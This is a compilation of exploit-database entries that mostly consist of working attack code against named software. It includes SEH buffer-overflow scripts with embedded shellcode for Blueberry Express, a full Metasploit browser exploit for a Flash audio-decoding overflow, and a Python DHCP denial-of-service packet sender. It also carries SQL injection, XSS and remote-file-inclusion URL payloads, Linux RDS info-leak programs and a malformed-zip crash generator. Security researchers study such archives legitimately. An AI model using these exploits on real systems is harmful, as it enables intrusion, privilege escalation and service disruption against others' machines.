Blueberry Express 5.9.0.3678 - Local Buffer Overflow (SEH)
Document Title: =============== Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1535 Video: http://www.vulnerability-lab.com/get_content.php?id=1537 Release Date: ============= 2015-06-29 Vulnerability Laboratory ID (VL-ID): ==================================== 1535 Common Vulnerability Scoring System: ==================================== 6.4 Product & Service Introduction: =============================== Create engaging movies by adding text, sound and images to your screen recording. Make sure your audience doesn`t miss a thing with easy-to-use Zoom-Pan and AutoScroll effects. Create polished tutorials and presentations with the help of powerful editing functions. Do it the easy way with BB FlashBack screen recorder. Its never been easier for everyone to see your movies. BB FlashBack screen recorder shares with FlashBack Connect or Youtube to display your movies on all devices.(FlashBack Connect is currently in Beta, and available only to Pro and Standard edition purchasers). (Copy of the Vendor Homepage: http://www.bbsoftware.co.uk/bbflashback.aspx ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Core Research Team discovered a local seh buffer overflow vulnerability in the official Blueberry Express v5.9.0.3678 software. Vulnerability Disclosure Timeline: ================================== 2015-06-29: Researcher Notification & Coordination (Ateeq Khan) Discovery Status: ================= Published Affected Product(s): ==================== Blueberry Software Product: Blueberry Express - Software 5.9.0.3678 Exploitation Technique: ======================= Local Severity Level: =============== High Technical Details & Description: ================================ A local SEH Buffer Overflow vulnerability has been discovered in the official Blueberry Express v5.9.0.3678 software. 
The vulnerability allows a local or remote attacker to gain higher system or access privileges by exploiting a classic SEH buffer overflow vulnerability. The local SEH buffer overflow affects multiple products including the BBFlashBack Recorder, Batch Export, etc. Other products using similar modules might also be affected. The vulnerability can be exploited by local attackers with a low-privileged system user account. The attack vector of the issue is server-side and the request method to execute the shellcode is local. The security risk of the buffer overflow vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) score of 6.4. Successful exploitation of this vulnerability results in complete compromise of the affected machine and system process. Proof of Concept (PoC): ======================= The buffer overflow vulnerability can be exploited by local attackers with a restricted system user account and without user interaction. For security demonstration or to reproduce the security vulnerability, follow the provided information and steps below. POC Description: For the POC, the researcher installed the software with admin privileges on a Windows system (allowed to run for all users); while the application was still running in the background, the researcher logged off and logged in as a different (low-privileged) user, then exploited the vulnerability successfully, obtaining a system shell with elevated admin privileges. Privilege escalation is possible in this scenario. Malware won't be able to exploit this vulnerability remotely, as this is a local exploit. Manual steps to reproduce the vulnerability ...
1) Run BB Flashback Express Recorder 2) Goto TOOLS > OPTIONS > MISC 3) Click on "Use custom folder" under the Temp Folder module 4) Copy / Paste the POC binary code (record.txt) into the input field of custom folder 5) Click OK Note: Calculator should popup hence proving the existence of this vulnerability PoC: Exploitcode # Exploit Title: Blueberry Express Recorder SEH based buffer overflow (Local) Exploit # Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/) # Windows Calc.exe Shellcode - Metasploit shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3" "\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c" "\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36" "\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f" "\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c" "\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1" "\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69" "\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55" "\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4" "\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2" "\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6" "\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25" "\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80" "\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6" "\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79") push="\x90" * 288 # Starting offset nseh="\xeb\x06\x90\x90" # Short jump seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH] nopsled="\x90" * 30 # NOPsled print "Creating expoit file" f=open("recorder.txt","w") try: f.write(push+nseh+seh+nopsled+shellcode) f.close() print "File created" except: print "File cannot be created" PoC#2: Exploitcode # Exploit Title: Blueberry Express Batch Export SEH based buffer overflow (Local) # Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/) 
print "Creating expoit file" f=open("batch.txt","w") #Create the file # Windows Calc.exe Shellcode - Metasploit shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3" "\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c" "\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36" "\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f" "\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c" "\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1" "\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69" "\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55" "\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4" "\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2" "\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6" "\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25" "\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80" "\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6" "\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79") push="\x90" * 6596 # Starting offset nseh="\xeb\x06\x90\x90" # Short jump seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH] nopsled="\x90" * 30 # NOPsled try: f.write(push+nseh+seh+nopsled+shellcode) f.close() print "File created" except: print "File cannot be created" Reference(s): http://www.bbsoftware.co.uk/ http://www.bbsoftware.co.uk/bbflashback/download.aspx Security Risk: ============== The security risk of the local seh buffer overflow software vulnerability is estimated as high. (CVSS 6.4) Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Ateeq Khan (Ateeq@evolution-sec.com) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. 
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
-
Orchard CMS 1.7.3/1.8.2/1.9.0 - Persistent Cross-Site Scripting
----------------- Background ----------------- Orchard is a free, open source, community-focused content management system written on the ASP.NET platform using the ASP.NET MVC framework. Its vision is to create shared components for building ASP.NET applications and extensions, and specific applications that leverage these components to meet the needs of end-users, scripters, and developers. ------------------------ Software Version ------------------------ The versions of Orchard affected by this issue are 1.7.3, 1.8.2 and 1.9.0. Versions below 1.7.3 are not affected. --------------- Description --------------- A persistent XSS vulnerability was discovered in the Users module that is distributed with the core distribution of the CMS. The issue potentially allows elevation of privileges by tricking an administrator into executing a custom crafted script on his behalf. The issue affects the Username field, since a user is allowed to register a username containing potentially dangerous characters. More information can be found here: http://docs.orchardproject.net/Documentation/Patch-20150630 ---------------------- Proof of Concept ---------------------- 1. Attacker registers a new user account with a username such as <script>alert("XSS")</script> 2. The administrator attempts to delete the account using the Users core module. 3. Once the administrator clicks on the "delete" action, the XSS payload is executed. ------------- Mitigation ------------- See http://docs.orchardproject.net/Documentation/Patch-20150630 ----------- Timeline ----------- 2015-06-10 Vulnerability reported to Orchard CMS development team 2015-06-12 Response and issue verification 2015-06-30 Update and patch release 2015-07-06 Public Disclosure --------- Credits --------- Reported by Paris Zoumpouloglou of Project Zero labs (https://projectzero.gr) -- Paris Zoumpouloglou @pzmini0n https://projectzero.gr
-
Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit)
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser encoded audio inside a FLV video, as exploited in the wild on June 2015. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160, Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160, Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466. Note that this exploit is effective against both CVE-2015-3113 and the earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression to the same root cause as CVE-2015-3043. 
}, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-3043'], ['CVE', '2015-3113'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'], ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'], ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'], ['URL', 'http://bobao.360.cn/learning/detail/357.html'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161') return true if ver =~ /^17\./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'Jun 23 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf @flv = create_flv super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, 
{'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end if request.uri =~ /\.flv$/ print_status('Sending FLV...') send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end def create_flv header = '' header << 'FLV' # signature header << [1].pack('C') # version header << [4].pack('C') # Flags: TypeFlagsAudio header << [9].pack('N') # DataOffset data = '' data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0 data << "\xee" * 0x440 # SoundData tag1 = '' tag1 << [8].pack('C') # TagType (audio) tag1 << "\x00\x04\x41" # DataSize tag1 << 
"\x00\x00\x1a" # TimeStamp tag1 << [0].pack('C') # TimeStampExtended tag1 << "\x00\x00\x00" # StreamID, always 0 tag1 << data body = '' body << [0].pack('N') # PreviousTagSize body << tag1 body << [0xeeeeeeee].pack('N') # PreviousTagSize flv = '' flv << header flv << body flv end end
-
ISC DHCP 4.x - Multiple Denial of Service Vulnerabilities
source: https://www.securityfocus.com/bid/54665/info ISC DHCP is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to cause the affected application to crash, resulting in a denial-of-service condition. #!/usr/bin/python ''' SC DHCP 4.1.2 <> 4.2.4 and 4.1-ESV <> 4.1-ESV-R6 remote denial of service(infinite loop and CPU consumption/chew) via zero'ed client name length http://www.k1p0d.com ''' import socket import getopt from sys import argv def main(): args = argv[1:] try: args, useless = getopt.getopt(args, 'p:h:') args = dict(args) args['-p'] args['-h'] except: usage(argv[0]) exit(-1) dhcp_req_packet = ('\x01\x01\x06\x00\x40\x00\x03\x6f' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x22\x5f\xae' '\xa7\xdf\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x63\x82\x53\x63' '\x35\x01\x03\x32\x04\x0a\x00\x00' '\x01\x0c\x00' '\x37\x0d\x01\x1c\x02\x03\x0f' '\x06\x77\x0c\x2c\x2f\x1a\x79\x2a' '\xff\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00\x00\x00\x00\x00' '\x00\x00\x00\x00') sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 
sock.connect((args['-h'], int(args['-p']))) sock.sendall(dhcp_req_packet) print 'Packet sent' sock.close() def usage(pyname): print ''' Usage: %s -h <host> -p <port> ''' % pyname if __name__ == "__main__": main()
-
Joomla! Component Odudeprofile 2.8 - 'profession' SQL Injection
source: https://www.securityfocus.com/bid/54677/info Odudeprofile Component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Odudeprofile 2.7 and 2.8 are vulnerable; prior versions may also be affected. http://www.example.com/index.php?option=com_odudeprofile&view=search&profession=(SQL)
-
phpProfiles - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/54660/info phpProfiles is prone to multiple security vulnerabilities because it fails to sufficiently sanitize user-supplied input. Exploiting these vulnerabilities could allow an attacker to execute malicious code within the context of the web server process, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. phpProfiles 4.5.4 Beta is vulnerable; other versions may also be affected. http://www.example.com/full_release/community.php?action=showtopic&comm_id=00001&topic_id=0000000009&topic_title=[XSS] http://www.example.com/full_release/community.php?comm_id=[SQL] http://www.example.com/Full_Release/include/body_admin.inc.php?menu=http://www.example1.com/shell.txt?
-
tekno.Portal 0.1b - 'anket.php' SQL Injection
source: https://www.securityfocus.com/bid/54698/info tekno.Portal is prone to an SQL-injection vulnerability. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. tekno.Portal 0.1b is vulnerable; other versions may also be affected. http://www.example.com/teknoportal/anket.php?id=[SQLi]
-
Linux Kernel 2.6.x - 'rds_recvmsg()' Local Information Disclosure
/*
 * source: https://www.securityfocus.com/bid/54702/info
 *
 * The Linux kernel is prone to a local information-disclosure vulnerability.
 * Local attackers can exploit this issue to obtain sensitive information that
 * may lead to further attacks.
 */

/*
 * NOTE(review): two separate programs follow (rds_client.c and rds_server.c),
 * each with its own main(); they are meant to be compiled as two translation
 * units, not as one file.  Neither listing carries its #include lines: as
 * written the code needs at least <stdio.h>, <stdlib.h>, <string.h>,
 * <unistd.h>, <sys/socket.h>, <netinet/in.h> and <arpa/inet.h>.  AF_RDS is
 * provided by <sys/socket.h> on recent glibc; older toolchains may lack it,
 * so check before building.
 *
 * Both programs talk RDS (SOCK_SEQPACKET) over loopback: the server binds
 * 127.0.0.1:4000, the client binds 127.0.0.1:4001 and exchanges one
 * message with it.
 */

/***************** rds_client.c ********************/

/*
 * Client side of the demonstration.
 *
 * Binds an RDS socket to 127.0.0.1:4001, sends the string "data from client"
 * (including its NUL terminator) to 127.0.0.1:4000, then blocks in recvmsg()
 * for the reply and prints it.  Exits with status 1 after closing the socket
 * on any failed socket call; returns 0 otherwise.
 */
int main(void)
{
    int sock_fd;
    struct sockaddr_in serverAddr;  /* local address this client binds to */
    struct sockaddr_in toAddr;      /* destination: the server on port 4000 */
    char recvBuffer[128] = "data from client";  /* reused for send and receive */
    struct msghdr msg;
    struct iovec iov;

    sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if (sock_fd < 0) {
        /* NOTE(review): perror() appends ": <strerror>" after the message, so
         * the embedded '\n' splits the diagnostic across two lines. */
        perror("create socket error\n");
        exit(1);
    }

    memset(&serverAddr, 0, sizeof(serverAddr));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    serverAddr.sin_port = htons(4001);
    if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
        perror("bind() error\n");
        close(sock_fd);
        exit(1);
    }

    memset(&toAddr, 0, sizeof(toAddr));
    toAddr.sin_family = AF_INET;
    toAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    toAddr.sin_port = htons(4000);

    /* Outgoing message: one iovec covering the string plus its terminator. */
    msg.msg_name = &toAddr;
    msg.msg_namelen = sizeof(toAddr);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_iov->iov_base = recvBuffer;
    msg.msg_iov->iov_len = strlen(recvBuffer) + 1;
    msg.msg_control = 0;
    msg.msg_controllen = 0;
    msg.msg_flags = 0;
    if (sendmsg(sock_fd, &msg, 0) == -1) {
        /* The message text says sendto() although sendmsg() is what failed. */
        perror("sendto() error\n");
        close(sock_fd);
        exit(1);
    }
    printf("client send data:%s\n", recvBuffer);

    /* Reuse the same buffer for the reply; zero it so the printf below
     * cannot run into stale bytes from the outgoing string. */
    memset(recvBuffer, '\0', 128);
    msg.msg_name = &toAddr;           /* recvmsg() overwrites this with the sender */
    msg.msg_namelen = sizeof(toAddr);
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_iov->iov_base = recvBuffer;
    msg.msg_iov->iov_len = 128;       /* whole buffer; no room is reserved for a NUL */
    msg.msg_control = 0;
    msg.msg_controllen = 0;
    msg.msg_flags = 0;
    if (recvmsg(sock_fd, &msg, 0) == -1) {
        perror("recvmsg() error\n");
        close(sock_fd);
        exit(1);
    }
    /* NOTE(review): %s assumes the server's 128-byte reply contains a NUL. */
    printf("receive data from server:%s\n", recvBuffer);

    close(sock_fd);
    return 0;
}

/***************** rds_server.c ********************/

/*
 * Server side of the demonstration.
 *
 * Binds an RDS socket to 127.0.0.1:4000 and loops forever: receive one
 * message, print it, append a suffix and send the (whole 128-byte) buffer
 * back to whatever address recvmsg() stored in fromAddr.  Exits with status
 * 1 after closing the socket if recvmsg()/sendmsg()/bind() fail; the
 * close()/return 0 after the loop are unreachable.
 *
 * The demonstration hinges on msg_namelen: the caller advertises a 32-byte
 * name buffer while fromAddr is only sizeof(struct sockaddr_in) (16) bytes.
 * The author reports that the kernel writes the full advertised length into
 * userspace, so the bytes beyond fromAddr land on the neighbouring stack
 * variable -- here sock_fd, as the "old"/"new socket fd" prints are meant to
 * show.  Which variable is actually clobbered depends on the compiler's
 * stack layout and is not guaranteed to be sock_fd.
 */
int main(void)
{
    struct sockaddr_in fromAddr;    /* 16 bytes; declared right before sock_fd */
    int sock_fd;
    struct sockaddr_in serverAddr;
    unsigned int addrLen;           /* NOTE(review): declared but never used */
    char recvBuffer[128];
    struct msghdr msg;
    struct iovec iov;

    sock_fd = socket(AF_RDS, SOCK_SEQPACKET, 0);
    if(sock_fd < 0) {
        perror("create socket error\n");
        /* NOTE(review): exit(0) reports success to the shell on a failed
         * socket(); the client and every other error path here use exit(1). */
        exit(0);
    }

    memset(&serverAddr, 0, sizeof(serverAddr));
    serverAddr.sin_family = AF_INET;
    serverAddr.sin_addr.s_addr = inet_addr("127.0.0.1");
    serverAddr.sin_port = htons(4000);
    if (bind(sock_fd, (struct sockaddr*)&serverAddr, sizeof(serverAddr)) < 0) {
        perror("bind error\n");
        close(sock_fd);
        exit(1);
    }
    printf("server is waiting to receive data...\n");

    msg.msg_name = &fromAddr;
    /*
     * Add 16 to sizeof(fromAddr), i.e. 32, and pay attention to the
     * declaration order above: recvmsg() will overwrite sock_fd, since the
     * kernel copies 32 bytes to userspace.
     *
     * If you just use sizeof(fromAddr), it works fine.
     */
    msg.msg_namelen = sizeof(fromAddr) + 16;
    /* msg.msg_namelen = sizeof(fromAddr); */
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_iov->iov_base = recvBuffer;
    msg.msg_iov->iov_len = 128;     /* receive and (below) send the full buffer */
    msg.msg_control = 0;
    msg.msg_controllen = 0;
    msg.msg_flags = 0;

    while (1) {
        printf("old socket fd=%d\n", sock_fd);
        if (recvmsg(sock_fd, &msg, 0) == -1) {
            perror("recvmsg() error\n");
            close(sock_fd);
            exit(1);
        }
        /* NOTE(review): recvBuffer holds up to 128 received bytes and is not
         * guaranteed to be NUL-terminated; %s and the strcat() below both
         * assume it is, and strcat() can also write past the 128-byte array.
         * Fine for a PoC paired with the bundled client, not for real input. */
        printf("server received data from client:%s\n", recvBuffer);
        /* Length the kernel wrote back (socklen_t, so %u would match). */
        printf("msg.msg_namelen=%d\n", msg.msg_namelen);
        printf("new socket fd=%d\n", sock_fd);
        strcat(recvBuffer, "--data from server");
        /* Reply goes to msg.msg_name (fromAddr, filled in by recvmsg()) using
         * the same 128-byte iovec, so the whole buffer is sent back. */
        if (sendmsg(sock_fd, &msg, 0) == -1) {
            perror("sendmsg()\n");
            close(sock_fd);
            exit(1);
        }
    }

    close(sock_fd);
    return 0;
}
-
File Roller v3.4.1 - Denial of Service (PoC)
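#!/usr/bin/perl
#
# Title: File Roller - DoS PoC
# Date: 08/07/2015
# Author: Arsyntex
# Homepage: https://wiki.gnome.org/Apps/FileRoller
# Version: v3.4.1
# Tested on: Linux lab 3.2.0-85-generic-pae #122-Ubuntu i686 i386 GNU/Linux
# -------------------------------------------------------------------------
# Create a zip file with a folder inside named: #
#
# Run: file-roller --extract-here test.zip
#
# Result: endless calls of lstat64() (50 % CPU usage) (Freeze app)
#
# Writes poc.zip into the current directory (overwriting any existing file
# of that name).  The archive image is laid out by hand as three ZIP
# records: a local file header (PK\x03\x04), one central directory entry
# (PK\x01\x02) and the end-of-central-directory record (PK\x05\x06); the
# single entry's name is the two bytes 0x23 0x2f, i.e. "#/".  The byte
# string must stay exactly as is -- offsets and sizes inside it refer to
# each other.
#
use strict;
use warnings;

my $zip = "\x50\x4b\x03\x04\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46\x00\x00" .
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x23\x2f" .
          "\x50\x4b\x01\x02\x3f\x03\x14\x03\x00\x00\x00\x00\xd6\x55\x9c\x46" .
          "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00" .
          "\x00\x00\x00\x00\x00\x00\x10\x80\xfd\x41\x00\x00\x00\x00\x23\x2f" .
          "\x50\x4b\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x30\x00\x00\x00" .
          "\x20\x00\x00\x00\x00\x00";

# Lexical filehandle and three-argument open instead of a bareword global;
# binmode keeps the raw bytes intact on platforms that translate newlines.
open my $fh, '>', 'poc.zip' or die("Can't open poc.zip\n");
binmode($fh);
# print and close can both fail (full disk, closed stream); the original
# ignored their return values, so a truncated archive went unnoticed.
print {$fh} $zip or die("Can't write poc.zip: $!\n");
close($fh) or die("Can't close poc.zip: $!\n");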
-
ocPortal 7.1.5 - 'redirect' Open Redirection
source: https://www.securityfocus.com/bid/54715/info ocPortal is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. Versions prior to ocPortal 7.1.6 are vulnerable. http://www.example.com/ocportal/index.php?page=login&type=misc&redirect=http://example1.com
-
Barcodewiz 'Barcodewiz.dll' ActiveX Control - 'Barcode' Method Remote Buffer Overflow
